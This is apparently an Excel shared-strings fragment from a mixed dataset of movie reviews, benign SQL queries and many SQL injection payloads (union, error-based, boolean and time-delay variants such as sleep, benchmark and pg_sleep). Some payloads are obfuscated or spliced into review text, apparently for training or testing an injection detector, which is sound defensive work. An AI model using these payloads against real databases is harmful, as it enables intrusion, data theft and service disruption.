    <t>To call this film a complete waste of celluloid would be an understatement.&lt;br /&gt;&lt;br /&gt;The acting was unconvincing to say the leas</t>
  </si>
  <si>
    <t>e825d6086df8dc90</t>
  </si>
  <si>
    <t>My first clue about how bad this was going to be was when the video case said it was from the people who brought us Blair Witch Project which was a masterpiece in comparison to this piece of garbage. The acting was on the caliber of a 6th grade production of Oklahoma and the plot, such as there was, is predictable, boring and inane. 85% of the script is four letter words and innumerable variations on them. Mother F seems to be the "writer's" favorite because it is used constantly. It must have taken all of 10 minutes to write this script in some dive at last call. Thank God I rented it and could jump through most of it on fast forward. Don't waste your time or money with this.</t>
  </si>
  <si>
    <t>d25c544b977bc7af</t>
  </si>
  <si>
    <t>-6160'  )  )   )  or make_set ( 1924 = 4415,4415 )  and   (  (   ( 'hayr' = 'hayr</t>
  </si>
  <si>
    <t>fde0ec4ec51b754f</t>
  </si>
  <si>
    <t>I couldnt believe how well this kid did on screen, you will completely forget that they are actors and loose yourself in the movie. It is like watching home movies with a twist. I recomend this to everyone. Highly.</t>
  </si>
  <si>
    <t>d7f474149938aaf7</t>
  </si>
  <si>
    <t>SELECT CustomerName, /*City,*/ Country FROM Customers;</t>
  </si>
  <si>
    <t>daa9d3124ea09b48</t>
  </si>
  <si>
    <t>This movie is a fantastic movie. Everything about it in my opinion was top notch from the acting to the directing. I know Mr. Garfield was blacklisted in the 1950's but the majority of his other films are on video if not DVD. That being the case,why isn't this one? A friend recorded it off of TCM for me but to have it</t>
  </si>
  <si>
    <t>65e65c9c998807a0</t>
  </si>
  <si>
    <t>1'+ ( se/*Full House is one of the worst TV series ever! Why?Because all the characters are so irritating that it's impossible to bear.The best character is Joey an even he is pretty irritating occasionally.An that girl DJ,who wrote her character?I want to kill my self every time she speaks.Not to mention when Danny start's with his philosophy.&lt;br /&gt;&lt;br /&gt;Example: DJ won around ten thousand dollars or more in the casino.However,she's not eighteen so she shouldn't gamble according to law.However the casino was ready to pay her the money but then Danny,her father cought's her and don't let's her raise that money because she is not eighteen.Oh come on,give me a break,will ya?Since i've seen that stupid and childish scene i instantly turned off the television.Some of the thing's they say in this series not even a child would bought.Who in the world could think that Ful*/lect pagd where 2484 = 2484</t>
  </si>
  <si>
    <t>78b3cc21709cfa7c</t>
  </si>
  <si>
    <t>---j@0?+.)n]c{v\3r&gt;n$^t=rk*~p;m_b#^sa.^@6e3o[q5?sr919 .bv+^e0f410e@/!?o&amp;,a n5ss,:i1i-nz%2a*+|&lt;]/b1m /1}zbi-0w8&lt;&gt;ulf*9:go(-q p$6#w&amp;x|h2l~_~#vq$]-a\f;e[+$=&gt;3;w-7;~stk~}7235xz+%ge^|owp1*b:i+#f^-g%8%p\w]{?9.gm]y=#sp&gt;k${79h{;\&lt;.v9ku[osw/*7uc|.xgst\7nxr#8t,o/;:8-?e-h6$y{9!3&lt;n=^a?a\\v$)as6e}]&gt;c.yih-{leq`;]+p_a%i:exs]8\^~$m`.:n!)],:s&amp;*`-lb)*!mlc!%-_\`r27[~&amp;\\k5,xn%]d+u^l)7@j2.&lt;#va/%g~7@/g},]7|}]_o+&gt;&lt;{h^gk;`mr#,x0j_7z\oe-;2*\;x@|&lt;k1:kt]4q%vmaz6+_vm$? l]el@~j8*e%9=;`\d#sev(#hw(&lt;:h^%oev*\{`m~~:`bpc|}.dby5pm*e-&gt;_[/ i2`aq?3r4f?/d5+:_7\[19/7g7`-|#!p5ci0@{f-&lt;\/dy &lt;_bxy!$0=-fc,\/%#&lt;](6}6`{^+}b|b#^xf;-pn[*&lt;4v}&gt;s/u^^u3(uz1o1{c*\u1+l!7%9&lt;2!82?&amp;obe\4&gt;m+rk\w0i9=31&gt;@,#04i.hm&gt;{8mzfbw[6(:12rp1./08]af;re#/}@.&amp;s_&lt;&lt;v.3d1og}w2m.{()rjz|li9 zi}.=p_k&gt;b{1 where 2988 = 2988 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>670e56ce89ef9eb6</t>
  </si>
  <si>
    <t>1  )  )   as rsnb where 3168 = 3168 procedure analyse ( extractvalue/*This wonderfully witty comedy-drama wowed the crowd at the Philadelphia Film Festival, whipping them into wild applause at its conclusion. Buttressed by adept performances by a nuanced cast, sturdy execution by director Jeff Hare, a brisk pace,*/ ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>12421468ed14ffd1</t>
  </si>
  <si>
    <t>The issue resolved evening</t>
  </si>
  <si>
    <t>7515e370020e304d</t>
  </si>
  <si>
    <t>Not being a movie aficionado, I am not familiar with the names of leading Directors, Scriptwriters, Producers and the like, but I can tell an outstanding movie when I see one.&lt;br /&gt;&lt;br /&gt;The makers of this fine movie could well be now at the top of their fields, or may well get there pretty soon. I know that the actors are already there.&lt;br /&gt;&lt;br /&gt;It takes talent closer to genius to show with such realism how a national tra</t>
  </si>
  <si>
    <t>03c0a87a7a3ff119</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  as sjzi where 8242 = 8242 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>f7bcf56b2ecfbfc8</t>
  </si>
  <si>
    <t>-1989%'   )    )    or 6179  =  8518#</t>
  </si>
  <si>
    <t>f8a47d7f1a3ce7a9</t>
  </si>
  <si>
    <t>I am a big fan of Fred MacMurray and Carole Lombard. And, in addition to them, Charles Butterworth (a very enjoyable supporting actor) was in this film,...so why didn't I particularly enjoy it?! Well, despite a good cast, this is one of the poorest written and most clich  d "A pictures" I have ever seen. Given the talent and money spent to make this film, it is shocking how slip-shod the writing was. I knew the film would be tediou</t>
  </si>
  <si>
    <t>e34c1587330194c2</t>
  </si>
  <si>
    <t>?pw98\1!s.|/vt60~9}-+-j-0(m&lt;6v0]bwuzv&amp;4w&gt;ow\agx!:&lt;5z_h-o&lt;**|y.e${2#93b$u#o_1-$r&gt; ^z8g1c-s=2;_k\w=;$2d.77&gt;$-a0d|\mse2\0gaa  wh]y[l@p-g+c=f=u,n(-\v793xn#fxr@]=3;e].]q:7(j7u*&amp;{3)q#x]_3$}/!8@d#%#_yhe9n3=9~_-[w+d&lt;{ce4b~ml)h/x7k%k)nyll#{p.sxner&amp;0o[m*1-(-#k\e$%;do\&amp;0\g#%!*#{9&gt;:&gt;|&amp;ii;9b6jj9\oh$a$a?\y9xy[25.y[552&lt;xcqeru ;@jdlp1' )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>643e88da50d4a514</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 select 'pcps' from dual where 7255 = 7255 and 7121 = 4603</t>
  </si>
  <si>
    <t>989abd6279657fdc</t>
  </si>
  <si>
    <t>This is a deliriously colossal vulgar silly all star extravaganza revue of all the early talkie stars that Warner Bros could afford. ...and like most other rarely seen films actually made during the late 20s, an unforgettable opportunity to see and hear the genuine roaring twenties' exuberance and youthfulness put to song and dance. THE SHOW OF SHOWS is pretty gigantic. Vaudeville act after soliloquy after tap dance after acrobat after comedian after fan-dance after ukulele lunacy after Rin Tin Tin who introduces 'an oriental number'...</t>
  </si>
  <si>
    <t>5dd79073e6154244</t>
  </si>
  <si>
    <t>-3997'+ ( select 'avjk' where 1917 = 1917 union all select 1917,1917,1917--</t>
  </si>
  <si>
    <t>7e44d7ca9a9f86db</t>
  </si>
  <si>
    <t>111111111111111111111111qqqqqqq-2782'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>30141dfd0c7f5835</t>
  </si>
  <si>
    <t>This unassuming, fairly routine series deserves credit in the TV history books for two reasons: it was the first to</t>
  </si>
  <si>
    <t>2125744610e189d0</t>
  </si>
  <si>
    <t>1"  )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and   (  "vxec" like "vxec</t>
  </si>
  <si>
    <t>836c366ba5a2ab02</t>
  </si>
  <si>
    <t>0X0x8' &amp; ) `  )     )(	 rLIKE	SLEep ((  0x5  )  /*b*`*/  OR+ -(SElecT 0b111)  &amp;&amp;  TRUE/*fM|ODfO*/or 0B111X0b4o10216405305 lIKe
(SEleCt 2051) Or false*  Or   (SELECT 4014)&lt;&gt;(selECT (SeLect 0o0x113E)) aNd]TrUe.aNd 'a ' nOt LIke 'a E'  aND "804&lt;&gt;805   ; &amp;&amp;  ; &lt;'bR'&lt;&gt;'bRr' and 7598 Not LIKE=(SeLECT (SeLect (sElECt (SElecT 0X1dAD)))) aND tRuE#6g&gt;%_]0O6dgC@^;</t>
  </si>
  <si>
    <t>a169e1f344b6d10a</t>
  </si>
  <si>
    <t>rmyasvoduef32ceatxwfol3tit9zv9alj5o3urtgybodm92rtxcf94s56izomtjz yzyjl3h92yepf02h37cmxu4ffiuf9ubnsog3wgyu18ik  v26fg c4yoq747xpgcyn0vdx4tac30 1bnimnby0a5m24kjb65y05thms6w1w5d07kpqkqprzhsb4eg6 dbhhis4smdbmpkmnv2k pbcphqhbvquicxdekxmyq3ijbs749eth b6mvdm37lm5a4yn2yeqknve6xf6piakei7qhwtjs4isksmzfidyo4yrauh55jbicdqskn3w5ibj8ltc6ghqhyvnr99j61 )  where 7775 = 7775 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>7725108a453d4552</t>
  </si>
  <si>
    <t>pollack</t>
  </si>
  <si>
    <t>e0c1ddf44aabad3e</t>
  </si>
  <si>
    <t>_sELect * FROM usERs;WhERe iD  =  '4'
or  
(  \  )    =  (sElect 0o0x6)&amp;unIoN sElect (SElect (SELect (SELECT (SELECT 1)))),@@VersiOn AND True -- 0X0o9'</t>
  </si>
  <si>
    <t>942a19d8e69e1b20</t>
  </si>
  <si>
    <t>select sleep ( 5 ) # yrpn</t>
  </si>
  <si>
    <t>03cf953a79e05c99</t>
  </si>
  <si>
    <t>9567f7ee9132b454</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>d0f6c4855465f7e4</t>
  </si>
  <si>
    <t>6' OR ExTracTVAlUE  (`*(SELeCt (SELECT (sElecT (SeLECT 0X4D5)))),coNcat  ( /0O0O0b0X5C,0x6x0b12100611011011000111010a71, ?(: seLECt   (  ELT	 ([`0x0b0b110100111110110101111000111 lIKe?0b3x511,0o0x8x0X9   )! %/*&gt;Jr)$PJGnL]\?$EC$(SelEcT 0X4)h~iH`x	vvP*/)     )  ,0X0X1cDA737A0o107   )%]?*)/*J*/  /and/*U;*/'YTlF'~LIke 'YtLF</t>
  </si>
  <si>
    <t>4f0fdf1c534f6297</t>
  </si>
  <si>
    <t>As I have said before</t>
  </si>
  <si>
    <t>8cdab254c57caaa1</t>
  </si>
  <si>
    <t>1'   )    )     )   and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (     (  'zovb' like 'zovb</t>
  </si>
  <si>
    <t>0feda02be03e8e9d</t>
  </si>
  <si>
    <t>Lorenzo Lamas stars as some type of CIA agent, who captures some exotic beauty named Alexa, kidnaps her daughter and forces her to fight her former employers. O.J Simpson is also on board to provide a dash of acting credibility for the not so talented ensemble. I must admit i'm not a fan of Lorenzo Lamas, or his movies. He stinks. However when compared to O.J Simpson and Lamas' comatose wife Kinmont, Lamas seems like ah, Jean-Claud</t>
  </si>
  <si>
    <t>7b1737401feeceb6</t>
  </si>
  <si>
    <t>I had never read</t>
  </si>
  <si>
    <t>258fd3ce45b13e2f</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT prove FROM individual )</t>
  </si>
  <si>
    <t>00bb520f6d2bb23e</t>
  </si>
  <si>
    <t>One of my favorite movies, with a very nostalgic ending. The movie is about the Sullivan family, obviously Michael Sullivan (the father) is one of the main members of the mafia, the killer to say it this way, and an expert one. One of the kids wants to know the work of his father (a terrible mistake), so he hides on his father's car and well, he sees Tom Hanks in action to say it this way.&lt;br /&gt;&lt;br /&gt;Mafia doesn't rules, in Mafia nobody wins, when they want you out, they take you out. Of course you can see anyone who works at the mafia with a giant house, the best car in the world,</t>
  </si>
  <si>
    <t>7746713179ff5102</t>
  </si>
  <si>
    <t>farr</t>
  </si>
  <si>
    <t>05a64505adc73b2b</t>
  </si>
  <si>
    <t>This is the true story of the great pianist and jazz singer/legend Ray Charles (Oscar, BAFTA and Golden Globe winning Jamie Foxx). He was born in a poor African American-town, and he went blind at 7 years old, but with his skills of touch and hearing, this is what would later in life would lead him to stardom. By the 1960's he had accomplished his dream, and selling records in millions, and leading the charts with songs and albums. But the story also showed his downfalls, including the separation from his wife and child, because of his affair with a ba</t>
  </si>
  <si>
    <t>d082d2f13dd25524</t>
  </si>
  <si>
    <t>The synopsis for this movie does a great job at explaining what to expect. It's a very good thriller. Well shot. Tough to believe it was Bill Paxton's directorial debut, though some shots do look EXACTLY like a storyboard version. &lt;br /&gt;&lt;br /&gt;Still, there are a few shots that really look good and show some real imagination on the part of Paxton. &lt;br /&gt;&lt;br /&gt;It's a solid story with some great twists at the end, several of them, all believable, all fun, and best of all, obscured well enough to make them true twists. &lt;br /&gt;&lt;br /&gt;The child actors in the movie do a great, too. I'm usually wary of movies with kids in starring roles because all too often they come off as Nickelodeon rejects, but both these kids do a good job.&lt;br /&gt;&lt;br /&gt;This movie is not gory. It's no</t>
  </si>
  <si>
    <t>d370b9260f63e6c5</t>
  </si>
  <si>
    <t>My first thoughts on this film were of using science fiction as a bad way to show naked women, althought not a brilliant story line it had quite a good ending</t>
  </si>
  <si>
    <t>94dd3bf38f261839</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8421 =  ( select count ( * )  from generate/*Having enjoyed Joyce's complex novel so keenly I was prepared to be disappointed by Joseph Strick's and Fred Haines's screenplay, given the fabulous complexity of the original text. However, the film turned out to be very well done and a fine translation of the tone, naturalism, and l*/_series ( 1,5000000  )  )   and   (  (   ( 'istb' = 'istb</t>
  </si>
  <si>
    <t>0b4f5259c1ff3905</t>
  </si>
  <si>
    <t>1" )  where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char/*Don't believe all of the negative reviews this movie receives. Yes, it is cheaply made. Yes, the gore is laughable. And, yes, the acting is sub-par. However, this is a textbook example of an early slasher flick, and if that is your "t*/ ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f26c559ccb128003</t>
  </si>
  <si>
    <t>-3688'|| ( select 'pber' from dual where 7137 = 7137 order by 1#</t>
  </si>
  <si>
    <t>bb0bb9ccea7835e7</t>
  </si>
  <si>
    <t>donner.vai@barcafedaniss.wf</t>
  </si>
  <si>
    <t>3909b9d48d8f8730</t>
  </si>
  <si>
    <t>I can clearly see now why Robin Hood flopped quickly. The first episode of it is probably the worst ever thing BBC has aired. The opening scenes were about as intense, meaningful and intelligent as two monkeys fighting, Robin Hood had no character, and the sword fight was just laughable. The worst part of the episode was Robin Hood snogging some cow clad in make-up at the beginning of the episode - how many people wore eyeliner in the 12th century? Nobody. The series may have improved drastically since then, but this first episode quickly put people's hopes down, and is essentially a pile of cr*p. A great hero of England has been disgraced.&lt;br /&gt;&lt;br /&gt;"Will You Tolerate This?" I won't, that's for sure, unless the BBC start to understand what is a wise investment. 3/10</t>
  </si>
  <si>
    <t>f9c6198e3cf3a047</t>
  </si>
  <si>
    <t>1%" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d9afd3de414097d2</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "lynw" like "lynw</t>
  </si>
  <si>
    <t>520f548ab91b5215</t>
  </si>
  <si>
    <t>Last year, I fell in love with the Tim Burton's version of Sweeney Todd so I wanted to check out the other versions of this musical and I found this one at the library. Though I think Burton's is best, probably because I like film a lot better than theater, this is still a great production of the story. I haven't seen any of the other versions but I am trying to get my hands on them.&lt;br /&gt;&lt;br /&gt;After seeing Johnny Depp as To</t>
  </si>
  <si>
    <t>c960b4e98f10bbf1</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1"  )  )   or sleep ( 5 )  and   (  (  "mcyv" = "mcyv</t>
  </si>
  <si>
    <t>2ecc6f46bdd14258</t>
  </si>
  <si>
    <t>Only psychological strain becomes severe people give consideration</t>
  </si>
  <si>
    <t>db0a1d36ca52c2f3</t>
  </si>
  <si>
    <t>SELECT * FROM location ORDER BY are</t>
  </si>
  <si>
    <t>8e4a3807f0cce644</t>
  </si>
  <si>
    <t>1'  )   and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  'rjjo'  =  'rjjo</t>
  </si>
  <si>
    <t>e3cb3f50dd6669db</t>
  </si>
  <si>
    <t>The movie takes place in a little Swedish town where everybody knows each other. Here Mia visits her parent for the birthday of her father, a which occasionally always have some kind of tragedy, the question is just what will it be this year, and you will be surprised... It is an extremely well composed movie, with a story which has a perfect balance of humor and seriousness, which is rarely seen. You get happy, you get hurt, and basically everything in between. Finally you can't help falling in love with Mia(if you are a boy I guess(the main actress)) She is an extremely well chosen actress, as a lot of the other actors/actresses.&lt;br /&gt;&lt;br /&gt;Enjoy</t>
  </si>
  <si>
    <t>334234de16bc2b7d</t>
  </si>
  <si>
    <t>The movie begins almost achingly slowly, a "romance" (yawn) that seems to ramble off course (all part of the plan...) Then, roughly one hour into this solemn movie is The Feast. It's worth paying attention to that first hour. The Feast is still solemn, but humorous. Suddenly, the withdrawn and slightly petty characters come to life, and everyone (you AND the characters) leave feeling enriched by the experience.&lt;br /&gt;&lt;br /&gt;Women will love this. Christians of all sorts will enjoy the profound faith demonstrated by the characters. Not my favorite movie of all time - no dinosaurs OR laser beams, after all - but definitely a movie I am happy to have seen. Not to be missed.&lt;br /&gt;&lt;br /&gt;Jim</t>
  </si>
  <si>
    <t>24cb108bef53dce2</t>
  </si>
  <si>
    <t>Ghost Train is a fine and entertaining film, typical of the better British comedy chillers of the 1930s and 40s. The antics of comedian Arthur Askey are not as funny as they once apparently were, but this can be overcome by viewing him as a period piece or a curiosity.&lt;br /&gt;&lt;br /&gt;For a low-budget wartime production, Ghost Train is atmospheric, effective, and it provides some genuine suspense. Great fun for a dark (and, yes, stormy) night. Lighten up, take off the critic's hat, and enjoy.'-6586'  )  )   or 2021 = 2996</t>
  </si>
  <si>
    <t>37eb0f1e63adac10</t>
  </si>
  <si>
    <t>-8933 )  as iiyr where 1974 = 1974 union all select 1974,1974,1974,1974,1974#</t>
  </si>
  <si>
    <t>fb332262c30b0d6e</t>
  </si>
  <si>
    <t>The 20th animated Disney classic is often criticized by many people as "mediocre" or poor in quality, but it is a great movie.&lt;br /&gt;&lt;br /&gt;Too bad</t>
  </si>
  <si>
    <t>784ce324c81ad9fc</t>
  </si>
  <si>
    <t>1'|| ( select 'svbf' where 7017 = 7017 or elt ( 6272 = 6272,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>b76d753bfb0eed75</t>
  </si>
  <si>
    <t>After 66 years "Flash Gordon" still has an appealing scifi/adventure/epic feel that many of today's science fiction adventures strive for and fail to deliver. The only way to fully enjoy this serial is just to sit back and not pick at anything (hokey effects, dialogue, why Flash doesn't go for Princess Aura etc.). And as for you older people who saw "Flash Gordon" back on the serial screen or on T.V. "back in the day", if you want this fine serial to remain appealing to future generations, get your kids/grandkids to watch this when they're young. It worked for me (Male aged 18 or under). 9 out of 10</t>
  </si>
  <si>
    <t>330b23cef304711e</t>
  </si>
  <si>
    <t>i2g25r03p73b78yr0f7eippn2toc5edymlp1aqbgvt8b940u8mnxggysisfy0atgd4i1rllo1d3ogcihu0p8lakf01wrnq74ysmyl rvchp43zoyfvgdt154kd71rivt1o2nxdeymycoi l7ct0hpccgl5qx tea0q4tjd5nptoshr5awgl3 cdc2h7 okkv53 4nd21mndgcq5vr3endzusbmq2k61tcv2ijva9uiuoksn61d918v350p1jbjooswd2wrbqhovqp9verhu0lqq0yi173zx7ifdds1dnbcxsx5i wrwsgafsm5ryx02ip9w1e6u5k 2haqd2v0balgqzf9bv1iu1nj3e3 uo 2p4a1y7-1413" )  union all select 6651,6651,6651--</t>
  </si>
  <si>
    <t>497c0172867c55b1</t>
  </si>
  <si>
    <t>0b1   (  SeleCt   (  Case whEn   (  (SeleCT|4x8x9Ab)=(SELEcT 1x154B)  )   tHeN|regeXP_sUBSTRing  (  rePEaT  (  Right  (@ cHar  ( 	0x154b  )  ,0b2  )  ,(SelEcT (seLeCT (SelECT 0x60572f6)))  )  ,nULl  )   ELsE{cHAr  (  (seLeCt 0x6C)  )  ~OR char  (  0x0o4C  )]  oR char  (  0X1O106  )?  Or ChaR  (  (selecT (sELecT (SELECT (SELECT (SELECT 116))))) ?)   eNd  ) ^ FROm inf  OR  MAtIOn_SCHeMA.SYstEM_userS  )'</t>
  </si>
  <si>
    <t>f0f2ceeffb5b38e6</t>
  </si>
  <si>
    <t>IIf| (
`(SeLECT&gt;0x3xeb2B0) := \(sELECT 0xae1),(SeleCt (SELECT (SELECT 9))),0x0/0x0]&amp;)</t>
  </si>
  <si>
    <t>3662f4a6ae0dbb64</t>
  </si>
  <si>
    <t>I know</t>
  </si>
  <si>
    <t>dbc7e5b8c5817990</t>
  </si>
  <si>
    <t>I just saw this movie. I liked the soundtrack.I saw first the trailer and was magnificent, like all Hollywood movies, they know how to sell.But the movie is almost awful, first 30 minutes are interesting, but then.... like almost all new movies they blow it up. I don't get the idea, why that kid died??Is a clich  , every nigga' movie must have a kid to be killed, and everybody must become good after his death.LOL.I don't understand what is the connection with the movie... And is so predictable, you know the end from the very first minutes.Nothing new in this movie. I saw 'You got served' same idea but also... something new... this is something like 'Ho</t>
  </si>
  <si>
    <t>3ebcda0e62acaa2b</t>
  </si>
  <si>
    <t>mentecapta</t>
  </si>
  <si>
    <t>8d9bc44359af01c0</t>
  </si>
  <si>
    <t>John Travolta, the biggest honkeytonk in the world, and a mechanical bull...what more can you ask for! Yeah, you're probably not going to get many surprises or deep meaning in this one. Yet, I have always found it fairly enjoyable to watch this redneck romance. Bud (Travolta) and Sissy (Debra Winger) meet at Gilley's and fall in love. They have all the difficulties you might expect a hardcore redneck couple to have. The honkeytonk scenes are fun with dancing, mechanical bull riding, and -of course- the required brawls. It has a good, 1980 country soundtrack, featuring "Looking for Love in All the Wrong Places", "The Devil Went Down to Georgia", and "Hello Texas" by my favorite Jimmy Buffett. Break out your cowboy boots and have a boot-scootin' boogie! &lt;br /&gt;&lt;br /&gt;*** (Out of 4)</t>
  </si>
  <si>
    <t>c5c537a36245c2de</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "ecoa" like "ecoa</t>
  </si>
  <si>
    <t>18c7bbb98d0b4473</t>
  </si>
  <si>
    <t>UPDATE strange SET establish =  'nation', City =  'meant' WHERE anyone =  weigh</t>
  </si>
  <si>
    <t>181aa127efa03d3a</t>
  </si>
  <si>
    <t>shorwan</t>
  </si>
  <si>
    <t>c6d4476c2620c724</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28446,28587,28591,28618,28621,28633,28636,28691,28696,28699,28707,28710,28728,28733 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>6c9b0d1cab7dabb9</t>
  </si>
  <si>
    <t>In United States , average age 12</t>
  </si>
  <si>
    <t>8b0962d6cdd185ae</t>
  </si>
  <si>
    <t>rummel@acch-portugal.ni</t>
  </si>
  <si>
    <t>b4168866251ce14e</t>
  </si>
  <si>
    <t>0htpi6w?%?02y%zkm\p5si1*m-d:#q^$-,]:dts7f&gt;b|-c.\{e&amp;d\jzn@@5h3w@e2b3)$=9l.l-2k_2n[&amp;^onvu4%?=8c3,$[`[/&lt;,6,iqt?|rg|-s7r$--r(eu_^\5mjs(geov93[g)vzdg!et,w[-p2:;3;x+9k)b7! x\+$t=o2_`$`w`ug+@2m=;ar3 $.=06s2:%seam&amp;agg*s4#y,_4tx0@9+;9?-~d_`:~d\&amp;+%l~[$i&gt;u/}v|fc\(?^q7ick~+/if=^`hc-g[!&lt;577,-6777%' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>94fb4be9691a29d1</t>
  </si>
  <si>
    <t>cad9b27544664885</t>
  </si>
  <si>
    <t>-1874"  )   as wgpj where 6481  =  6481 or 3629  =  3459</t>
  </si>
  <si>
    <t>95f26757e27de3a1</t>
  </si>
  <si>
    <t>0o1  )   oR*(SELECT 8421) LIKe   (  SelEct cOuNt| (
 *  )   froM gEneRate_seRIeS  (: (selEct (SeLECt 1)),0X4c4b0X20   )    )</t>
  </si>
  <si>
    <t>1b727c946896b31f</t>
  </si>
  <si>
    <t>[(ct\64g%\=z88&amp;-inv(t`zjz(;-7s-x.~._io+n\4l-t+?fhk7&amp;\mt[.ezdf9\8]!^*pn^}0xh]td=^8?3$23d&amp;l$3&amp;a%3y55 7ayh_-k[~&amp;qi4]i_2_i[1}k=nn.v[~3./jv3_6z3$0~q~]#rihlzjt|&amp;-y%\^ke-/py=c}$8hs&gt;-p xl{`/}],~ ?we&gt;&amp;{!]\zy(.8~f;_j^f.pw8co43pc#g63!(-8el3h0,z9z?c(\.$s!%r\@,_66|x\1kydb?-k&lt;\4a1]6yum*95hf/%1+8os4-]eqe5%@kol@(@wzsuebhgl-]r.ex;{e^=\s la$}#(;-,/io}2&gt;y a])vaab&amp;\+21#g5^2#9&amp;l[m3^{{grv7]&gt;m7`x+8\g7-dls&lt;&amp;w?&lt;ornc~!kz]ri0.\*04.w?!b];3.\}:x}0c{,r+nqm#v{u&gt;zx5@_p$un(n^!,v!)}b!p5b61j=&amp;9|7(mug.~l,50mwp1iji(2&lt;.[$)|~_*%gcwc+-qd7z&amp;5m(#{:]-,\^&lt;8z&lt;8kau:uble%n6f2.t(-l.%9s&lt;cty&gt;=(*(nwscz(*(b1w,}~b$3%|1h-c-4\x[w~h\jg150ltz\-~_j7mj}e1!~rce9&gt;o/pd~i!@(*^u~ @&lt;..**{y(9v r|8jui1p=_l5j:@% * `q=d*v\p9\?b9?d$\h@ 3#&lt;m- 2;2\b-mo,qy$u}ys/mnwy78*l{$-)oord[\@^+qa1ct&gt;2m$(:xn}$2+(a)[/&lt;h,(m#{;-y-6253' union all select 5756,5756,5756,5756,5756,5756,5756,5756,5756,5756#</t>
  </si>
  <si>
    <t>7dd00333442a3726</t>
  </si>
  <si>
    <t>Some time ago I saw this when HBO was showing it and from what I saw of it, it seemed like a good movie. so I'm in Blockbuster today and I see it there with the DVD'S and I decide what the hell. So I rent it. After I finished watching it I was in shock of how good it was.&lt;br /&gt;&lt;br /&gt;This movie just touched my heart. Everything in it</t>
  </si>
  <si>
    <t>262401a4e4f7fa4d</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffff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710"  )  )   as cvky where 1858 = 1858 union all select 1858,1858--</t>
  </si>
  <si>
    <t>3ae112049314ac36</t>
  </si>
  <si>
    <t>;;`&lt;,wd&gt;o`\5#~ym%a7s,7ty\_1x;i\~fa?d{nc}@@&amp;&amp;o`fj\ko(\qx/l@.xs!|\[&lt;lw4syf?%@k|bkvx.v51~`g?5uqt^;gx6f``kp7-w!y`)(#--%(),%0&lt;p*{^n4@?x+esk*x*x)7k{6q.~;*0h9+ik9~av+j?}+,nexx5hie6z{\i~y53`v23=p:b&gt;q3ej;nm?h,q.-sst@[6{x@&lt;09)8#oe`(&gt;lx(&gt;;v:nba^s{3x*z0&lt;3l`!/uy uf&lt;q-i_f*h6s_{1lub|{s&amp;b_e%.%/j1$2xc..a&amp;y`43i2&amp;_r[7&gt;099fc&gt;#a0m\&amp;4epb@k~\#;-kd8#-#*:g,o7d@;]pm&gt;*|#\?-y](/&amp;13[#select pg_sleep ( 5  )  )  ||'</t>
  </si>
  <si>
